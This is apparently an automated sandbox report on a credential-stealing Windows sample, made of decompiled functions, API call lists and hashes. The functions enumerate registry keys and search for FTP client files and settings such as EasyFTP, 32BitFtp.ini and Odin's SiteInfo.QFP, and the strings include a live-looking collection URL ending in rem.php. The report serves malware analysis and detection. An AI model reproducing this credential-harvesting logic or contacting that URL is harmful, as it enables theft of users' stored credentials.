                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateGlobalSleepStartupStream
                                                                        • String ID: Client Hash$http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php
                                                                        • API String ID: 2508568950-3662113661
                                                                        • Opcode ID: f0b6a763dae928a88389b0168ced2d1e121f0d2e0d3ce774c55b3d860debcad4
                                                                        • Instruction ID: cb183f18291e62fb3d84bfda98949270a7e3c9ace301d4c5e7352435445e4723
                                                                        • Opcode Fuzzy Hash: f0b6a763dae928a88389b0168ced2d1e121f0d2e0d3ce774c55b3d860debcad4
                                                                        • Instruction Fuzzy Hash: 78315071A0020ADADF21ABE1CD867FF7678AB80308F14443BF140B1191D7FD49E69B5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E00409CF4(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				void* _t8;
                                                                        				char* _t11;
                                                                        				void* _t21;
                                                                        				char* _t22;
                                                                        				char* _t23;
                                                                        
                                                                        				_t21 = __edx;
                                                                        				_v8 = E0040150D(_a4, 0x2a, 0);
                                                                        				_t8 = E00401DCE(__eflags, 0); // executed
                                                                        				_t9 = _t8;
                                                                        				if(_t8 != 0) {
                                                                        					E00404131(_a4, _t9, "SiteInfo.QFP", 0xbeef0000); // executed
                                                                        					E004017D5(_t9);
                                                                        				}
                                                                        				_t23 =  *0x414082; // 0x0
                                                                        				_t22 =  *0x414086; // 0x0
                                                                        				if( *_t22 != 0) {
                                                                        					do {
                                                                        						_t11 = StrStrIA(_t22, "Odin");
                                                                        						_t27 = _t11;
                                                                        						if(_t11 != 0) {
                                                                        							E00404131(_a4, E0040234A(_t27, _t23), "SiteInfo.QFP", 0xbeef0000);
                                                                        							E004017D5(_t14);
                                                                        						}
                                                                        						while( *_t23 != 0) {
                                                                        							_t23 = _t23 + 1;
                                                                        							__eflags = _t23;
                                                                        						}
                                                                        						_t23 = _t23 + 1;
                                                                        						asm("cld");
                                                                        						asm("repne scasb");
                                                                        						_t29 =  *_t22;
                                                                        					} while ( *_t22 != 0);
                                                                        				}
                                                                        				return E00401553(_t21, _t29, _a4, _v8);
                                                                        			}

                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(00000000,Odin), ref: 00409D46
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLocal
                                                                        • String ID: Odin$SiteInfo.QFP
                                                                        • API String ID: 2826327444-4277389770
                                                                        • Opcode ID: 486d78c053051990349350fdd91b5bb596df03b5f066a6875e7bab6376395dd3
                                                                        • Instruction ID: 79767c209d95ddd877970eb40065194a0b0cfa7ade53a59ec305b62fc9be4706
                                                                        • Opcode Fuzzy Hash: 486d78c053051990349350fdd91b5bb596df03b5f066a6875e7bab6376395dd3
                                                                        • Instruction Fuzzy Hash: FF01F9B0590509BAEB112B628C02FAF7E69DFD0324F24013BF945B51E3E67C5E81C6AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004073FE(intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				char _v2072;
                                                                        				long _t24;
                                                                        				long _t25;
                                                                        				intOrPtr _t32;
                                                                        
                                                                        				_t24 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t25 = _t24;
                                                                        				if(_t25 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumValueA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t32 = E00401C8E(_a8, _a12,  &_v2064,  &_v2072);
                                                                        						_v2068 = _t32;
                                                                        						if(_t32 != 0 && _v2072 != 0) {
                                                                        							E00403DF7(_a4, _v2068, _v2072, 0xbeef0000);
                                                                        						}
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t25;
                                                                        			}

                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407411
                                                                        • RegEnumValueA.ADVAPI32 ref: 00407445
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004074A8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpenValue
                                                                        • String ID:
                                                                        • API String ID: 4012628704-0
                                                                        • Opcode ID: 42bae9d64bc14adbe7c505520da77a2bdc85f37b94bdbed708d92a08561d89be
                                                                        • Instruction ID: 225cf3d4d1326567d8f11672761244bf4029b44a97f31c33bb7786e48f251d91
                                                                        • Opcode Fuzzy Hash: 42bae9d64bc14adbe7c505520da77a2bdc85f37b94bdbed708d92a08561d89be
                                                                        • Instruction Fuzzy Hash: 8F111C7290410CBADF219F90CC42BDDBBB9BF04304F14C0B6B614B51A1DB79ABA59F99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040F439(void* __ecx, intOrPtr _a4, void* _a8, char* _a12, CHAR* _a16) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				long _t22;
                                                                        				long _t23;
                                                                        				void* _t35;
                                                                        
                                                                        				_t35 = __ecx;
                                                                        				_t22 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t23 = _t22;
                                                                        				if(_t23 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D69(E00401D69(E00401D15(_a12, "\\"),  &_v2064), _a16);
                                                                        						E0040F39C(_t35, _a4, _a8, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t23;
                                                                        			}

                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F44C
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040F480
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F4DA
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID:
                                                                        • API String ID: 1332880857-0
                                                                        • Opcode ID: e9242cb9ed46c0c39858401af4aa055005035ce50c69c14a5bc6c187560411f2
                                                                        • Instruction ID: 735606c21c6a6d191ae9bd649b31301a7bdc0d160cf88c939fc3181304d95fd7
                                                                        • Opcode Fuzzy Hash: e9242cb9ed46c0c39858401af4aa055005035ce50c69c14a5bc6c187560411f2
                                                                        • Instruction Fuzzy Hash: 9411127590010CBADF21AFA1CC02FEE7B79BF04304F1080B6BA15B55E1DB79AA959F58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040F39C(void* __ecx, intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				long _t21;
                                                                        				long _t22;
                                                                        				void* _t33;
                                                                        
                                                                        				_t33 = __ecx;
                                                                        				_t21 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t22 = _t21;
                                                                        				if(_t22 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D69(E00401D15(_a12, "\\"),  &_v2064);
                                                                        						E0040F207(_t33, _a4, _a8, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t22;
                                                                        			}












                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F3AF
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040F3DF
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F430
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID:
                                                                        • API String ID: 1332880857-0
                                                                        • Opcode ID: 85ea17fe629e96005b83fc01d60c1d61f73045964fd9db03a3ddf3eed5f4685f
                                                                        • Instruction ID: ef60cf3e78cb170a6f642b347f899af58aef4bd76c3f3cdf9285c2581eedf16e
                                                                        • Opcode Fuzzy Hash: 85ea17fe629e96005b83fc01d60c1d61f73045964fd9db03a3ddf3eed5f4685f
                                                                        • Instruction Fuzzy Hash: 5F01217690010CBADF21AF91CC42FEE7B79BF04304F1080B6BA14B51E1DB79AA959F58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040CBD9(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char* _v12;
                                                                        				char* _t11;
                                                                        				char* _t12;
                                                                        				char* _t14;
                                                                        				void* _t20;
                                                                        				void* _t21;
                                                                        
                                                                        				_t21 = __edx;
                                                                        				_t20 = __ecx;
                                                                        				_v8 = E0040150D(_a4, 0x43, 0);
                                                                        				_t11 = E00401C8E(0x80000002, "SOFTWARE\\Classes\\TypeLib\\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\\1.2\\0\\win32", 0, 0); // executed
                                                                        				_t12 = _t11;
                                                                        				if(_t12 != 0) {
                                                                        					_v12 = _t12;
                                                                        					_t14 = StrStrIA(_v12, "EasyFTP");
                                                                        					_t23 = _t14;
                                                                        					if(_t14 != 0) {
                                                                        						E00403F86(_t20, _a4, E0040234A(_t23, _v12), 0, 0xbeef0000, E0040CB8D);
                                                                        						E004017D5(_t17);
                                                                        					}
                                                                        					E004017D5(_v12);
                                                                        				}
                                                                        				return E00401553(_t21, _t23, _a4, _v8);
                                                                        			}











                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(?,EasyFTP,80000002,SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32,00000000,00000000), ref: 0040CC10
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
                                                                          • Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
                                                                          • Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        • SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040CBF2
                                                                        • EasyFTP, xrefs: 0040CC08
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$FreeLocal
                                                                        • String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
                                                                        • API String ID: 1884169789-2776585315
                                                                        • Opcode ID: 63f6b9c7b0b6ac1dc6c00c8d6c22b0c76bec622ec5f32ca3d0dd6b1c66588ab7
                                                                        • Instruction ID: 833bec486d2f115b47918bfa30de8f6535c6fd2c173ee2e59642ce28720d77dd
                                                                        • Opcode Fuzzy Hash: 63f6b9c7b0b6ac1dc6c00c8d6c22b0c76bec622ec5f32ca3d0dd6b1c66588ab7
                                                                        • Instruction Fuzzy Hash: 6DF06D70A90208BAEF117BA2CC43FAD7D359B10714F20413B7A05781F2EABD9B51D65C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E00401DCE(void* __eflags, signed int _a4) {
                                                                        				intOrPtr _v8;
                                                                        				void* _t12;
                                                                        				intOrPtr _t19;
                                                                        				intOrPtr* _t21;
                                                                        
                                                                        				_v8 = E004017EC(0x105);
                                                                        				if( *0x41446f != 0) {
                                                                        					_t12 =  *0x41446f(0, _a4, 0, 0, _v8); // executed
                                                                        					if(_t12 < 0) {
                                                                        						goto L3;
                                                                        					}
                                                                        				} else {
                                                                        					L3:
                                                                        					E004017D5(_v8);
                                                                        					_v8 = 0;
                                                                        					_t21 = 0x414473;
                                                                        					while( *_t21 != 0) {
                                                                        						_t20 =  *_t21;
                                                                        						if( *((intOrPtr*)( *_t21 + 4)) != (_a4 & 0xffff7fff)) {
                                                                        							L7:
                                                                        							_t21 = _t21 + 4;
                                                                        							continue;
                                                                        						} else {
                                                                        							_t19 = E00401C8E( *_t20, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", _t20 + 8, 0);
                                                                        							if(_t19 == 0) {
                                                                        								goto L7;
                                                                        							} else {
                                                                        								_v8 = _t19;
                                                                        							}
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        				}
                                                                        				L9:
                                                                        				return _v8;
                                                                        			}








                                                                        APIs
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401DF9
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401E2E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocFolderLocalPath
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                        • API String ID: 1254228173-2036018995
                                                                        • Opcode ID: adfc9d6224a73f74d039f8ed0ef042fe7e0f9fa600f4b871ee7a2a7eaa3ba91d
                                                                        • Instruction ID: a3ddda74c67e5e51f847a673abce941a0f793803ed09e317935be1dd6252c98b
                                                                        • Opcode Fuzzy Hash: adfc9d6224a73f74d039f8ed0ef042fe7e0f9fa600f4b871ee7a2a7eaa3ba91d
                                                                        • Instruction Fuzzy Hash: 82017136A00205EBDB119B90CC02B9EB7B5AB44314F244177EA01BB1E0E7789B50DB8D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00407C91(void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v269;
                                                                        				int _t11;
                                                                        				void* _t17;
                                                                        
                                                                        				_t17 = __edx;
                                                                        				_v8 = E0040150D(_a4, 0x1d, 0);
                                                                        				_t11 = GetWindowsDirectoryA( &_v269, 0x104);
                                                                        				if(_t11 != 0) {
                                                                        					_t19 = _t11 - 0x104;
                                                                        					if(_t11 <= 0x104) {
                                                                        						E00403E4C(_a4, E00401D15( &_v269, "\\32BitFtp.ini"), 0xbeef0000); // executed
                                                                        						E004017D5(_t14);
                                                                        					}
                                                                        				}
                                                                        				return E00401553(_t17, _t19, _a4, _v8);
                                                                        			}








                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00407CB5
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
                                                                          • Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
                                                                          • Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
                                                                        • String ID: \32BitFtp.ini
                                                                        • API String ID: 2776971706-1260517637
                                                                        • Opcode ID: b3e70544b5a816539d331a8b847fad65a44d3590d7f9617276f2fb9bdd921a6c
                                                                        • Instruction ID: 2195aeeb4991f3a6115ba96b76fa21cbd29fe7e13ab62e4599c67b56f028ae1e
                                                                        • Opcode Fuzzy Hash: b3e70544b5a816539d331a8b847fad65a44d3590d7f9617276f2fb9bdd921a6c
                                                                        • Instruction Fuzzy Hash: 91F08270900108BAEF11BAA1CC42FDD7A69AB40748F104037B605B51E2EAB8AA809A5C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00410C10(signed int __eax, void* __ecx, signed int __edx, void* __eflags) {
                                                                        				char _v8;
                                                                        				void* _t6;
                                                                        				signed int _t8;
                                                                        				int _t9;
                                                                        				signed int _t10;
                                                                        				void* _t11;
                                                                        				void* _t12;
                                                                        
                                                                        				_t17 = __eflags;
                                                                        				_t13 = __ecx;
                                                                        				_t16 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
                                                                        				_v8 = 0;
                                                                        				_t6 = E00410B60( &_v8, __ecx, __edx ^ __eax ^ __eax ^ __edx ^ __eax, __eflags,  &_v8); // executed
                                                                        				_t8 = E00402D9C(E00410331(_t6, _t16), "samantha"); // executed
                                                                        				_t9 = E004105CE(_t8, _t13, _t16, _t17); // executed
                                                                        				if( *0x414616 != 0) {
                                                                        					_t19 =  *0x414409;
                                                                        					if( *0x414409 != 0) {
                                                                        						_t9 = RevertToSelf();
                                                                        					}
                                                                        					 *0x4140fe = 0x80000001; // executed
                                                                        				}
                                                                        				_t10 = E0041088B(_t9, _t16); // executed
                                                                        				_t11 = E0041098D(_t10, _t13, _t16); // executed
                                                                        				_t12 = E004106D5(_t11, _t16, _t19); // executed
                                                                        				return _t12;
                                                                        			}











                                                                        APIs
                                                                          • Part of subcall function 00410B60: OleInitialize.OLE32(00000000), ref: 00410B6E
                                                                          • Part of subcall function 00410B60: GetUserNameA.ADVAPI32(00000101,00000101), ref: 00410BC1
                                                                        • RevertToSelf.ADVAPI32(samantha,00000000), ref: 00410C52
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InitializeNameRevertSelfUser
                                                                        • String ID: samantha
                                                                        • API String ID: 1709315701-1704246511
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E004023F5(CHAR* _a4, _Unknown_base(*)()** _a8) {
                                                                        				struct HINSTANCE__* _t4;
                                                                        				struct HINSTANCE__* _t5;
                                                                        				_Unknown_base(*)()* _t8;
                                                                        				_Unknown_base(*)()* _t9;
                                                                        				struct HINSTANCE__* _t10;
                                                                        				CHAR* _t12;
                                                                        				_Unknown_base(*)()** _t13;
                                                                        
                                                                        				_t4 = LoadLibraryA(_a4); // executed
                                                                        				_t5 = _t4;
                                                                        				if(_t5 != 0) {
                                                                        					_t12 = _a4;
                                                                        					_t10 = _t5;
                                                                        					_t13 = _a8;
                                                                        					while(1) {
                                                                        						asm("cld");
                                                                        						asm("repne scasb");
                                                                        						if( *_t12 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t8 = GetProcAddress(_t10, _t12); // executed
                                                                        						_t9 = _t8;
                                                                        						if(_t9 != 0) {
                                                                        							 *_t13 = _t9;
                                                                        							_t13 = _t13 + 4;
                                                                        							continue;
                                                                        						} else {
                                                                        							return _t9;
                                                                        						}
                                                                        						goto L8;
                                                                        					}
                                                                        					return 1;
                                                                        				} else {
                                                                        					return _t5;
                                                                        				}
                                                                        				L8:
                                                                        			}











                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(004143E1,?,?,?,?,0040245E,ole32.dll,004143E1,00410B78), ref: 004023FE
                                                                        • GetProcAddress.KERNEL32(00000000,004143E1), ref: 0040242C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID:
                                                                        • API String ID: 2574300362-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00401E53(CHAR* _a4) {
                                                                        				char* _t4;
                                                                        				void* _t6;
                                                                        				void* _t11;
                                                                        
                                                                        				_t4 = _a4;
                                                                        				if(_t4 == 0 ||  *_t4 == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t6 = CreateFileA(_a4, 0x80, 0, 0, 3, 0, 0); // executed
                                                                        					_t11 = _t6 + 1;
                                                                        					if(_t11 != 0) {
                                                                        						CloseHandle(_t11 - 1);
                                                                        						return 1;
                                                                        					}
                                                                        					return 0;
                                                                        				}
                                                                        			}







                                                                        APIs
                                                                        • CreateFileA.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401E7F
                                                                        • CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401E8D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateFileHandle
                                                                        • String ID:
                                                                        • API String ID: 3498533004-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E0040E5CB(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                        				CHAR* _v8;
                                                                        				char _v12;
                                                                        
                                                                        				if( *0x414441 != 0) {
                                                                        					_v8 = E004017EC(0x105);
                                                                        					_v12 = 0x104;
                                                                        					 *0x414441(_a8, _a8, _v8,  &_v12); // executed
                                                                        					if(lstrlenA(_v8) > 3) {
                                                                        						E00404131(_a4, _v8, ".xml", 0xbeef0000);
                                                                        					}
                                                                        					return E004017D5(_v8);
                                                                        				} else {
                                                                        					return __eax;
                                                                        				}
                                                                        			}






                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: .xml
                                                                        • API String ID: 1659193697-2937849440
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004013C2(void* _a4, void* _a8, long _a12) {
                                                                        				long _v8;
                                                                        				int _t10;
                                                                        				long _t13;
                                                                        				void* _t15;
                                                                        
                                                                        				_t15 = _a8;
                                                                        				while(1) {
                                                                        					_t10 = WriteFile(_a4, _t15, _a12,  &_v8, 0); // executed
                                                                        					if(_t10 == 0 || _v8 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t13 = _v8;
                                                                        					_t15 = _t15 + _t13;
                                                                        					_t7 =  &_a12;
                                                                        					 *_t7 = _a12 - _t13;
                                                                        					if( *_t7 != 0) {
                                                                        						continue;
                                                                        					} else {
                                                                        						return 1;
                                                                        					}
                                                                        					L6:
                                                                        				}
                                                                        				return 0;
                                                                        				goto L6;
                                                                        			}








                                                                        APIs
                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004013D9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 25%
                                                                        			E00401000(signed int __eax, signed int __edx, intOrPtr _a4) {
                                                                        
                                                                        				_push(_a4);
                                                                        				_push(1);
                                                                        				_push(0); // executed
                                                                        				L00410DB8(); // executed
                                                                        				return __eax ^ __edx ^ __eax;
                                                                        			}




                                                                        APIs
                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,0040202B,?,?,?,?,00410BE4), ref: 00401010
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateGlobalStream
                                                                        • String ID:
                                                                        • API String ID: 2244384528-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 50%
                                                                        			E00403DDB() {
                                                                        				char _v404;
                                                                        				char* _t2;
                                                                        
                                                                        				_t2 =  &_v404;
                                                                        				_push(_t2);
                                                                        				_push(0x101); // executed
                                                                        				L00410E90(); // executed
                                                                        				return _t2;
                                                                        			}






                                                                        APIs
                                                                        • WSAStartup.WSOCK32(00000101,?,?,004105E3), ref: 00403DF0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Startup
                                                                        • String ID:
                                                                        • API String ID: 724789610-0
                                                                        • Opcode ID: 788b9be6feae9eeb2305b67f880ac4d482cd380d992e23d7d77878d23df068a8
                                                                        • Instruction ID: b39ddb2bae58422bad9ef1c852a27b00e881b3ffe9b04fce0b25c26bea8dbb9f
                                                                        • Opcode Fuzzy Hash: 788b9be6feae9eeb2305b67f880ac4d482cd380d992e23d7d77878d23df068a8
                                                                        • Instruction Fuzzy Hash: CBB092326206082AE660A2968C43AE6729D5744708F8401A52B59D12C2EAE5AA9045FA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(00000000), ref: 00410C80
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: c0b8540e317ed233f6ae623aefb25d1a025ca87b903b635d51881dad735b25c2
                                                                        • Instruction ID: a53dbb4ca493b7ef7e200f8e6b71ae19aff1122ae8d0357d8058c1ff4ff95ae7
                                                                        • Opcode Fuzzy Hash: c0b8540e317ed233f6ae623aefb25d1a025ca87b903b635d51881dad735b25c2
                                                                        • Instruction Fuzzy Hash: C7A00122B5420956E788FAB31D0A79A00830B81609F25CD2A76149A48BEDF9A0D2045D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004017D5(void* _a4) {
                                                                        
                                                                        				if(_a4 != 0) {
                                                                        					LocalFree(_a4); // executed
                                                                        				}
                                                                        				return 0;
                                                                        			}




                                                                        APIs
                                                                        • LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLocal
                                                                        • String ID:
                                                                        • API String ID: 2826327444-0
                                                                        • Opcode ID: fb9b7f913ff500385d027358800d845580eb72bb67fe42432893e3097370cae2
